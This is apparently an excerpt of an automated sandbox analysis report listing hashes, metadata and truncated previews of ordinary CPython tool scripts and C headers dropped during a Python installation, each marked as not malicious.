                                                                                                                                SHA-512:7C54239CBFCCAABA6919FA8F9CC448E1A764F0F90A669E8097485F557E9F856CD2D536649411699673A43BCB922683BAAF417610F9DBD4F643BC53D709AEEEB0
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Run Python's test suite in a fast, rigorous way.....The defaults are meant to be reasonably thorough, while skipping certain..tests that can be time-consuming or resource-intensive (e.g. largefile),..or distracting (e.g. audio and gui). These defaults can be overridden by..simply passing a -u option to this script....."""....import os..import shlex..import sys..import sysconfig..import test.support......def is_multiprocess_flag(arg):.. return arg.startswith('-j') or arg.startswith('--multiprocess')......def is_resource_use_flag(arg):.. return arg.startswith('-u') or arg.startswith('--use')....def is_python_flag(arg):.. return arg.startswith('-p') or arg.startswith('--python')......def main(regrtest_args):.. args = [sys.executable,.. '-u', # Unbuffered stdout and stderr.. '-W', 'default', # Warnings set to 'default'.. '-bb', # Warnings about bytes/bytearray.. ].... cross_compile = '_PYTHON_
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5195
                                                                                                                                Entropy (8bit):4.8861397107615545
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:y08jka1zAo3hdbFU5HdyThg7XcRZwtjPaQKPxAXF6lME7gtS14/Pa8MO2U6WM+yh:y0z6TjbFmYThscRZwta5POXF6enFPkO+
                                                                                                                                MD5:00BCDD4A072240A5A9D25DA8DE4C7517
                                                                                                                                SHA1:DB4AAC51CE23C39948A5BD161A1B56282CDE8B9A
                                                                                                                                SHA-256:3C0194F376623E6287684865F5EF0288C81CE72A8E690B7DAAD2DC3E828DB46C
                                                                                                                                SHA-512:5F428FD3E9DE82DAF7B4C28C418D4F7DA3B9F442CC1D967B4854C53C57D91A554B9CCC603328F634F956845436A8A6044B7675FFFACD691244C712235E35C935
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python..# Script checking that all symbols exported by libpython start with Py or _Py....import os.path..import subprocess..import sys..import sysconfig......ALLOWED_PREFIXES = ('Py', '_Py')..if sys.platform == 'darwin':.. ALLOWED_PREFIXES += ('__Py',)....IGNORED_EXTENSION = "_ctypes_test"..# Ignore constructor and destructor functions..IGNORED_SYMBOLS = {'_init', '_fini'}......def is_local_symbol_type(symtype):.. # Ignore local symbols..... # If lowercase, the symbol is usually local; if uppercase, the symbol.. # is global (external). There are however a few lowercase symbols that.. # are shown for special global symbols ("u", "v" and "w")... if symtype.islower() and symtype not in "uvw":.. return True.... # Ignore the initialized data section (d and D) and the BSS data.. # section. For example, ignore "__bss_start (type: B)".. # and "_edata (type: D)"... if symtype in "bBdD":.. return True.... return False......def get_ex
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25875
                                                                                                                                Entropy (8bit):4.713830423052057
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:6LuCr1dqO0flpVSfYoV9YKwWhjsoH6nH7emW/:6Lu8nqOip6Yo4KBAet
                                                                                                                                MD5:C4A5B6A8BF236B1DEFD018D554D56C62
                                                                                                                                SHA1:BE49418DBD4082D191A7E7BB99389BB3C5D11304
                                                                                                                                SHA-256:8207C1E09FD635D12CDEA0DB7C62B178E92A415D92E4617F5043E3905BC77CD1
                                                                                                                                SHA-512:673EF41531DA69901E496A39924811F862E43834506BBBCA35BDA41F8195A126143F329E521765A6B73E29D2798A35834DEF2DD1D6D2B3057244A1392A5CFCEA
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Check the stable ABI manifest or generate files from it....By default, the tool only checks existing files/libraries...Pass --generate to recreate auto-generated files instead.....For actions that take a FILENAME, the filename can be left out to use a default..(relative to the manifest file, as they appear in the CPython codebase)..."""....from functools import partial..from pathlib import Path..import dataclasses..import subprocess..import sysconfig..import argparse..import textwrap..import tomllib..import difflib..import shutil..import pprint..import sys..import os..import os.path..import io..import re..import csv....MISSING = object()....EXCLUDED_HEADERS = {.. "bytes_methods.h",.. "cellobject.h",.. "classobject.h",.. "code.h",.. "compile.h",.. "datetime.h",.. "dtoa.h",.. "frameobject.h",.. "genobject.h",.. "longintrepr.h",.. "parsetok.h",.. "pyatomic.h",.. "pytime.h",.. "token.h",.. "ucnhash.h",..}..MACOS = (sys.platform == "darwin")..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):457
                                                                                                                                Entropy (8bit):4.644548797861419
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:wKD/Z7f/0qIPwoxZQHlAhdaMMlwNSH5yADO02pg:n0pdXQHlixvpg
                                                                                                                                MD5:5B10A70A5266637E02A2C2222D695BE9
                                                                                                                                SHA1:31A27BAE93A5498F02FED90A5C8DF51B06CFC240
                                                                                                                                SHA-256:270F5D4893E901F9D2AC1AC66905C13F56953221817E96FFCDC53E516E20DD30
                                                                                                                                SHA-512:6CC5B4E36864F51E3EFD825D788FD2EE92497BA71E14AFA9FD3BF8152CD86E3FB7F94D4AE3AB6BBD91B7A1AC8CD601AC417EAEB8FB83E5D05F452510665C01FC
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Quick script to time startup for various binaries....import subprocess..import sys..import time....NREPS = 100......def main():.. binaries = sys.argv[1:].. for bin in binaries:.. t0 = time.time().. for _ in range(NREPS):.. result = subprocess.run([bin, "-c", "pass"]).. result.check_returncode().. t1 = time.time().. print(f"{(t1-t0)/NREPS:6.3f} {bin}")......if __name__ == "__main__":.. main()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):536
                                                                                                                                Entropy (8bit):4.515626564007633
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:yXWlkm7Mb5ZxZiJV4Z0nrycokncQBHaqrM5tX61ttg9VDw7yJ2aN:yXfm7MbjIrGWyDCNaN
                                                                                                                                MD5:33C223D95ECD5B8A68E857E80CEE2A32
                                                                                                                                SHA1:E4A530169A50672FF5E55093B75FB2EFFBD2B529
                                                                                                                                SHA-256:59A678E381B61C4C74FAE5424D8D482B43562DA94B7DD1CE16AC769F8C0D6C52
                                                                                                                                SHA-512:6973D7A9196AE00DC3CF5014A22FDBC151000B0D1AE5F38AE68352BC4C2A7DF13F0ACF74D4CB8E0CAAC35F7F788799FB1E81629662C7833190F60A4AF90A9C37
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# suff..#..# show different suffixes amongst arguments....import sys......def main():.. files = sys.argv[1:].. suffixes = {}.. for filename in files:.. suff = getsuffix(filename).. suffixes.setdefault(suff, []).append(filename).. for suff, filenames in sorted(suffixes.items()):.. print(repr(suff), len(filenames))......def getsuffix(filename):.. name, sep, suff = filename.rpartition('.').. return sep + suff if sep else ''......if __name__ == '__main__':.. main()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13413
                                                                                                                                Entropy (8bit):4.538225492652577
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ub7jY5HJH91qJx1W1Gyl4j7GykB+J5glLmKbUEuyt9e1ufMWLgECuAiobNk6Zsm/:ubIi1WF4eBlgufMWLW7k6ZslbhFtyjl
                                                                                                                                MD5:44F42EDB3E53464FAE507558C1543A52
                                                                                                                                SHA1:A31A5824FB670B0A5FA8BE504649C1C67E6BD43F
                                                                                                                                SHA-256:89D1D91B44756294BA707E562292912DD8D1CD7F9B21CE984C5ADD06AFDC5ADA
                                                                                                                                SHA-512:8635A473EACF7B88386ECF71E4CCEE84446075284187E422194E73A63EAF644135CC7E009B687FFA360ABF42FC80212CB20A86DCA07B200F9F8A0BC4A511A2F8
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Print a summary of specialization stats for all files in the..default stats folders..."""....import collections..import os.path..import opcode..from datetime import date..import itertools..import argparse....if os.name == "nt":.. DEFAULT_DIR = "c:\\temp\\py_stats\\"..else:.. DEFAULT_DIR = "/tmp/py_stats/"....#Create list of all instruction names..specialized = iter(opcode._specialized_instructions)..opname = ["<0>"]..for name in opcode.opname[1:]:.. if name.startswith("<"):.. try:.. name = next(specialized).. except StopIteration:.. pass.. opname.append(name)....# opcode_name --> opcode..# Sort alphabetically...opmap = {name: i for i, name in enumerate(opname)}..opmap = dict(sorted(opmap.items()))....TOTAL = "specialization.deferred", "specialization.hit", "specialization.miss", "execution_count"....def print_specialization_stats(name, family_stats, defines):.. if "specializable" not in family_stats:.. return.. total = sum
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):72444
                                                                                                                                Entropy (8bit):4.558468107981054
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:8ZwBRx8wIgenh0z0X9WVH3sfO5pZKYKx0egkaOAccW47+IONkEkizqIGzXfFjWW4:8q5KNWVEO5pZKwkLVdfgvFtaH3
                                                                                                                                MD5:416F37C0DD1120E642A8423268DE3CE8
                                                                                                                                SHA1:7DD78F613D01CE38EC5C41B098D151B3614AC172
                                                                                                                                SHA-256:8B5E7F13C42D1375BF8611AA71E92A089E35B2C94E01FF31AB49AA0B3C478E38
                                                                                                                                SHA-512:B8A017C1262FE843601521F42FB9B1C7C07898C5F3A4192CC73ADB885510F4193655311376D416F135D62F2B30779EBFB06B2C3F3193225345BA9435777B8F81
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# Convert GNU texinfo files into HTML, one file per node...# Based on Texinfo 2.14...# Usage: texi2html [-d] [-d] [-c] inputfile outputdirectory..# The input file must be a complete texinfo file, e.g. emacs.texi...# This creates many files (one per info node) in the output directory,..# overwriting existing files of the same name. All files created have..# ".html" as their extension.......# XXX To do:..# - handle @comment*** correctly..# - handle @xref {some words} correctly..# - handle @ftable correctly (items aren't indexed?)..# - handle @itemx properly..# - handle @exdent properly..# - add links directly to the proper line from indices..# - check against the definitive list of @-cmds; we still miss (among others):..# - @defindex (hard)..# - @c(omment) in the middle of a line (rarely used)..# - @this* (not really needed, only used in headers anyway)..# - @today{} (ever used outside title page?)....# More consistent handling of chapters/sections/etc...# Lot
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10143
                                                                                                                                Entropy (8bit):4.465977219273981
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:OkY4G/CslLCsLxnFK+y/DnQur4rZ0/F77dYITMy:ObCYLCsLxMtnQuc6t7B
                                                                                                                                MD5:0CFE386EEBE827DF9B3A5263C97DAE57
                                                                                                                                SHA1:1676AEE2552CF406BE17B4F6CA2452350AB5A450
                                                                                                                                SHA-256:4D1F52A0368C2B606C228E90CD4B9F93882F3D194D31153562D099996A68237D
                                                                                                                                SHA-512:F0836E728342653622B6FBBA3EA6E9858FD40D31CA4EBEBDF76C148DB5E2250A2FBB710FC8D9A2F3F0127CEF6831CD1472BE219BE897B7A5AE00E8D1F6755167
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Implementat marshal.loads() in pure Python....import ast....from typing import Any, Tuple......class Type:.. # Adapted from marshal.c.. NULL = ord('0').. NONE = ord('N').. FALSE = ord('F').. TRUE = ord('T').. STOPITER = ord('S').. ELLIPSIS = ord('.').. INT = ord('i').. INT64 = ord('I').. FLOAT = ord('f').. BINARY_FLOAT = ord('g').. COMPLEX = ord('x').. BINARY_COMPLEX = ord('y').. LONG = ord('l').. STRING = ord('s').. INTERNED = ord('t').. REF = ord('r').. TUPLE = ord('(').. LIST = ord('[').. DICT = ord('{').. CODE = ord('c').. UNICODE = ord('u').. UNKNOWN = ord('?').. SET = ord('<').. FROZENSET = ord('>
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1351
                                                                                                                                Entropy (8bit):4.479854272551691
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yX3K0aqy2CHblsJpFTiGwnM8+V02tM6waN:2a/cC76JpFTSN+VjWaN
                                                                                                                                MD5:F51308884538F46BD8182BB0D9A0D1AA
                                                                                                                                SHA1:2B99D6F6BE1F9618F7246FE8598EFBE285B5FD3C
                                                                                                                                SHA-256:A0E9354E920CD9A5FF208D15756D83D42A1D916202BE22382B289DB93A1E47A3
                                                                                                                                SHA-512:81D9EED7AA22ECD3F5DAF031B55F2BBABCF3066A356C81BD74F438328E7A18884E0F3B2E560BC8639A1FFC4AD243EE58B55969B13725ECC801C495E70FF2B412
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."Replace tabs with spaces in argument files. Print names of changed files."....import os..import sys..import getopt..import tokenize....def main():.. tabsize = 8.. try:.. opts, args = getopt.getopt(sys.argv[1:], "t:").. if not args:.. raise getopt.error("At least one file argument required").. except getopt.error as msg:.. print(msg).. print("usage:", sys.argv[0], "[-t tabwidth] file ...").. return.. for optname, optvalue in opts:.. if optname == '-t':.. tabsize = int(optvalue).... for filename in args:.. process(filename, tabsize)......def process(filename, tabsize, verbose=True):.. try:.. with tokenize.open(filename) as f:.. text = f.read().. encoding = f.encoding.. except IOError as msg:.. print("%r: I/O error: %s" % (filename, msg)).. return.. newtext = text.expandtabs(tabsize).. if newtext == text:.. return.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2856
                                                                                                                                Entropy (8bit):4.504542128393918
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:awZTm/o5oAaJhaPnp33JfdJtZJREOjbDnl9PgJQz95q5uOQLhfa+bPV:awZiQ5ovJ4PnrbVREOHDnlZbZ2QLF1d
                                                                                                                                MD5:865B640C3FEC25DAAE2379857405DE33
                                                                                                                                SHA1:FD06DF7E3BD4AE16D641A99E0EBEE04BF6877504
                                                                                                                                SHA-256:310FEB19B6F7FB885F7CA6C955712933013A32E722E8DECED6198F50EA2C4B90
                                                                                                                                SHA-512:26D2F70A6A9678140C3EAD6BBEB824BCB04166AD2157A899185E772245C532F264504567082A3F2F68B00F4E7785BD1F32F890AA0F6EB844897B4345C2B12374
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..A script that replaces an old file with a new one, only if the contents..actually changed. If not, the new file is simply deleted.....This avoids wholesale rebuilds when a code (re)generation phase does not..actually change the in-tree generated code..."""....import contextlib..import os..import os.path..import sys......@contextlib.contextmanager..def updating_file_with_tmpfile(filename, tmpfile=None):.. """A context manager for updating a file via a temp file..... The context manager provides two open files: the source file open.. for reading, and the temp file, open for writing..... Upon exiting: both files are closed, and the source file is replaced.. with the temp file... """.. # XXX Optionally use tempfile.TemporaryFile?.. if not tmpfile:.. tmpfile = filename + '.tmp'.. elif os.path.isdir(tmpfile):.. tmpfile = os.path.join(tmpfile, filename + '.tmp').... with open(filename, 'rb') as infile:.. line = infile.readline()....
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12209
                                                                                                                                Entropy (8bit):4.375798805668164
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:2lqQWztlqooooGooooGooooGooooGoooo3VqFcBq2222H83qdFFFRFFFRFFFRFF+:2vaqooooGooooGooooGooooGoooorq2d
                                                                                                                                MD5:5DB4015F6C2ADE6FC030561EF1612DF6
                                                                                                                                SHA1:D6C700FDC90FDE373383385F4E77361CE3E95ADC
                                                                                                                                SHA-256:AE871A6B3D635E816CEA3C8502A1828BB4C2B2DA8C92A044CF96D28109BB4857
                                                                                                                                SHA-512:5EF558F545FF3FF4494FF214F43E6F16086613DD500972C74F55051BA8A5B2F35E753F094822EDCE1B3BB5974E76382E29168477A5524382E362DD4186669A49
                                                                                                                                Malicious:false
                                                                                                                                Preview:'Show relative speeds of local, nonlocal, global, and built-in access.'....# Please leave this code so that it runs under older versions of..# Python 3 (no f-strings). That will allow benchmarking for..# cross-version comparisons. To run the benchmark on Python 2,..# comment-out the nonlocal reads and writes.....from collections import deque, namedtuple....trials = [None] * 500..steps_per_trial = 25....class A(object):.. def m(self):.. pass....class B(object):.. __slots__ = 'x'.. def __init__(self, x):.. self.x = x....class C(object):.. def __init__(self, x):.. self.x = x....def read_local(trials=trials):.. v_local = 1.. for t in trials:.. v_local; v_local; v_local; v_local; v_local.. v_local; v_local; v_local; v_local; v_local.. v_local; v_local; v_local; v_local; v_local.. v_local; v_local; v_local; v_local; v_local.. v_local; v_local; v_local; v_local;
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3282
                                                                                                                                Entropy (8bit):5.036125458582973
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:nEK3/SS006Jfn1e9Vx0xxuxG801ssfAY+ghjuw8/UnPS9gLJMh8z34q6PnEW9/DZ:Mp06skef0G6A+BSY9L+6k2WdD
                                                                                                                                MD5:6B6FF10B25D1415C8E72CBD96CDC3CDB
                                                                                                                                SHA1:D9742004AE5207E213AF6C9999277DD79D3DFD09
                                                                                                                                SHA-256:D117482C620C12CA4B08E86BB3FF88A862663B437A75BBD27879708150024177
                                                                                                                                SHA-512:CDC23831448DCF993862395B5EBE9D52439EF1CBC5198FB2BF9632094548038472C8F280EA46BFFFBC9B50F56122E7D0A6F67A161C1186A2510C5CB89027B887
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""..Compare checksums for wheels in :mod:`ensurepip` against the Cheeseshop.....When GitHub Actions executes the script, output is formatted accordingly...https://docs.github.com/en/actions/using-workflows/workflow-commands-for-github-actions#setting-a-notice-message.."""....import hashlib..import json..import os..import re..from pathlib import Path..from urllib.request import urlopen....PACKAGE_NAMES = ("pip", "setuptools")..ENSURE_PIP_ROOT = Path(__file__).parent.parent.parent / "Lib/ensurepip"..WHEEL_DIR = ENSURE_PIP_ROOT / "_bundled"..ENSURE_PIP_INIT_PY_TEXT = (ENSURE_PIP_ROOT / "__init__.py").read_text(encoding="utf-8")..GITHUB_ACTIONS = os.getenv("GITHUB_ACTIONS") == "true"......def print_notice(file_path: str, message: str) -> None:.. if GITHUB_ACTIONS:.. message = f"::notice file={file_path}::{message}".. print(message, end="\n\n")......def print_error(file_path: str, message: str) -> None:.. if GITHUB_ACTIONS:.. message = f"::
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1747
                                                                                                                                Entropy (8bit):4.0625575519147805
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:HyTmSgQv9N9DT2iGGwGZNIqEZK1ULCn6Bq7aN:HzovL9DTjPIhG6870
                                                                                                                                MD5:8A9BA67701A3EDB06FCA35155A3751E1
                                                                                                                                SHA1:72993D2F4E3813D2CA087172E9BFEC20E120D04B
                                                                                                                                SHA-256:9782D12275A4181CB8E57EEFF77E99034E90C07924308D651B76754AD239A3F1
                                                                                                                                SHA-512:C3974FC47F14FC3485367836BE2DBB2609383E92AB2E887EE146DA11FA6F9EC018B8054583D7E00077922420C7E048F73908298457E2F947DB4BFBFEB36B1A9D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# Variant of "which"...# On stderr, near and total misses are reported...# '-l<flags>' argument adds ls -l<flags> of each file found.....import sys..if sys.path[0] in (".", ""): del sys.path[0]....import sys, os..from stat import *....def msg(str):.. sys.stderr.write(str + '\n')....def main():.. pathlist = os.environ['PATH'].split(os.pathsep).... sts = 0.. longlist = ''.... if sys.argv[1:] and sys.argv[1][:2] == '-l':.. longlist = sys.argv[1].. del sys.argv[1].... for prog in sys.argv[1:]:.. ident = ().. for dir in pathlist:.. filename = os.path.join(dir, prog).. try:.. st = os.stat(filename).. except OSError:.. continue.. if not S_ISREG(st[ST_MODE]):.. msg(filename + ': not a disk file').. else:.. mode = S_IMODE(st[ST_MODE]).. if mode & 0o111:.. if not ident:..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1716
                                                                                                                                Entropy (8bit):4.882690799187895
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:Oe2UeopT5kiiHUNOKt6aSugEckMw6A5Bme1+8ADm21ExixtdiBaN:Oe2U3pT5kiR0KHgXAqT8A/1XoBaN
                                                                                                                                MD5:6791A1829259F50EEBE2F7833E3EE429
                                                                                                                                SHA1:FC577AA34C0EE3E6278716C42FA97F5AFDBC7178
                                                                                                                                SHA-256:7344CB0ADC1B4EF3E31150D2BF3BC49B685FCA505680FF6E0BACB50CE06C8E04
                                                                                                                                SHA-512:A973906993DFA0467284DAC47101EB73E74F8ACB733F132823500990D73C897D94A2A38EF820C60CAD00C04A33D300F4E4314C975066C1AB8C3504D0F62B78B9
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Add Python to the search path on Windows....This is a simple script to add Python to the Windows search path. It..modifies the current user (HKCU) tree of the registry.....Copyright (c) 2008 by Christian Heimes <christian@cheimes.de>..Licensed to PSF under a Contributor Agreement..."""....import sys..import site..import os..import winreg....HKCU = winreg.HKEY_CURRENT_USER..ENV = "Environment"..PATH = "PATH"..DEFAULT = "%PATH%"....def modify():.. pythonpath = os.path.dirname(os.path.normpath(sys.executable)).. scripts = os.path.join(pythonpath, "Scripts").. appdata = os.environ["APPDATA"].. if hasattr(site, "USER_SITE"):.. usersite = site.USER_SITE.replace(appdata, "%APPDATA%").. userpath = os.path.dirname(usersite).. userscripts = os.path.join(userpath, "Scripts").. else:.. userscripts = None.... with winreg.CreateKey(HKCU, ENV) as key:.. try:.. envpath = winreg.QueryValueEx(key, PATH)[0].. except OSError:..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2963
                                                                                                                                Entropy (8bit):4.910046571066118
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:FWjIW+giroK14vBtpMdGDOMIhmM66OTOH/j9JBo9qWju3rxR+yqbTorfCUeRKvsk:FCbEroK14v56MIhmM66OTOfJJBo9q8uv
                                                                                                                                MD5:F790166861E5BDE65F40DB10E8E0871B
                                                                                                                                SHA1:61A31C5A509FCAC146FA5E8617F92621E8B3BE84
                                                                                                                                SHA-256:77EAD0800D2AEBA0EE92514562A458459B57679B7A15735FE1C115C3F0A7FBA0
                                                                                                                                SHA-512:39B966DAB4B8E82130A48BDD738085B3FF080B33E6FA3C13F686F0E37382B0C0BECF39AE4AF818C6236600E07C6F3060E0F6F911DBA0E1A065DA860F2B81AEFC
                                                                                                                                Malicious:false
                                                                                                                                Preview:// Entry point of the Python C API...// C extensions should only #include <Python.h>, and not include directly..// the other Python header files included by <Python.h>.....#ifndef Py_PYTHON_H..#define Py_PYTHON_H....// Since this is a "meta-include" file, no #ifdef __cplusplus / extern "C" {....// Include Python header files..#include "patchlevel.h"..#include "pyconfig.h"..#include "pymacconfig.h"....#if defined(__sgi) && !defined(_SGI_MP_SOURCE)..# define _SGI_MP_SOURCE..#endif....// stdlib.h, stdio.h, errno.h and string.h headers are not used by Python..// headers, but kept for backward compatibility. They are excluded from the..// limited C API of Python 3.11...#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 < 0x030b0000..# include <stdlib.h>..# include <stdio.h> // FILE*..# include <errno.h> // errno..# include <string.h> // memcpy()..#endif..#ifndef MS_WINDOWS..# include <unistd.h>..#endif..#ifdef HAVE_STDDEF_H..# include <stddef.h>
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1292
                                                                                                                                Entropy (8bit):5.139223578690183
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:1wxib+xhH30pPiRDd/Of+JxyyYHlyt8zK5qYyN:1cgYw6do+/rYHgt8zEFyN
                                                                                                                                MD5:4DFEFE2CF6776C4087A404A44E3ED705
                                                                                                                                SHA1:35589BF1FD6E0875F9D6EA438D93431FA803CA6D
                                                                                                                                SHA-256:CD2BAB68EC67777D71D1E7EC4D33A2D29F96C5145E33D49E101CCDA692934BAE
                                                                                                                                SHA-512:52CD1A6E0F59FA9BA6E6D7B01B13B72B303A54C3B7D4710EF9079B5000A6D25F30D9785392E78BBB7D2559A78C5D4CE830B69A81B083DA96CB0204F7BD540B19
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_COMPLEXOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. double real;.. double imag;..} Py_complex;..../* Operations on complex numbers from complexmodule.c */....PyAPI_FUNC(Py_complex) _Py_c_sum(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_diff(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_neg(Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_prod(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_quot(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_pow(Py_complex, Py_complex);..PyAPI_FUNC(double) _Py_c_abs(Py_complex);..../* Complex object interface */..../*..PyComplexObject represents a complex number with double-precision..real and imaginary parts...*/..typedef struct {.. PyObject_HEAD.. Py_complex cval;..} PyComplexObject;....PyAPI_FUNC(PyObject *) PyComplex_FromCComplex(Py_complex);....PyAPI_FUNC(Py_complex) PyComplex_AsCComplex(PyObject *op);....#ifdef Py_BUILD_CORE../* Format t
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2037
                                                                                                                                Entropy (8bit):5.207131822983193
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:0QHsjzPmEioP8HyC29q/R7v9Dg0Bf9p9qmdfsD0+:VszPmLoP8R1TBL9qmlsD0+
                                                                                                                                MD5:4EDECC89DF2612ACEE7054F0F617E752
                                                                                                                                SHA1:0A5E83C28E5FBCED35D35B00E1FE1DCAAA891F10
                                                                                                                                SHA-256:D8D57A1EACD1AFB81DB5721C186A4904FF7D06279791D2ECF90FA790D0321651
                                                                                                                                SHA-512:DEC6F0D486A2CD5BF5A8DDCE2481A9B6DA93F5E8ECB59C5634B92B88735AD2A0E66AD92648F6C25541A8A81AA50ED94B1BBAC159761CD274F13AB38295027B32
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_LIMITED_API..#ifndef Py_CONTEXT_H..#define Py_CONTEXT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyContext_Type;..typedef struct _pycontextobject PyContext;....PyAPI_DATA(PyTypeObject) PyContextVar_Type;..typedef struct _pycontextvarobject PyContextVar;....PyAPI_DATA(PyTypeObject) PyContextToken_Type;..typedef struct _pycontexttokenobject PyContextToken;......#define PyContext_CheckExact(o) Py_IS_TYPE(o, &PyContext_Type)..#define PyContextVar_CheckExact(o) Py_IS_TYPE(o, &PyContextVar_Type)..#define PyContextToken_CheckExact(o) Py_IS_TYPE(o, &PyContextToken_Type)......PyAPI_FUNC(PyObject *) PyContext_New(void);..PyAPI_FUNC(PyObject *) PyContext_Copy(PyObject *);..PyAPI_FUNC(PyObject *) PyContext_CopyCurrent(void);....PyAPI_FUNC(int) PyContext_Enter(PyObject *);..PyAPI_FUNC(int) PyContext_Exit(PyObject *);....../* Create a new context variable..... default_value can be NULL...*/..PyAPI_FUNC(PyObject *) PyContextVar_New(.. const char *name, PyO
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1706
                                                                                                                                Entropy (8bit):4.913239676928551
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:0cgl1a/BKr2S03SuCaafSz7iS8SEma4O3:0cx7Sd/Faz7RTB4
                                                                                                                                MD5:940E4DB2ACBBFBD91EE392EB0C661202
                                                                                                                                SHA1:3531E8AC632E6C609AA5C2158096116D63330205
                                                                                                                                SHA-256:F00CA429993329A665C9CD2DE348321712B950B4EFED2E9C05DE6C16EB2E0DDB
                                                                                                                                SHA-512:5FFD6B6CC2AE290CF8B745918DFC651A677993617102D91BFEED7B4E7065FA106364306B2D829B14A9FD5A9865FA11D132305DCCB9BB6C6AB240A30FF674A875
                                                                                                                                Malicious:false
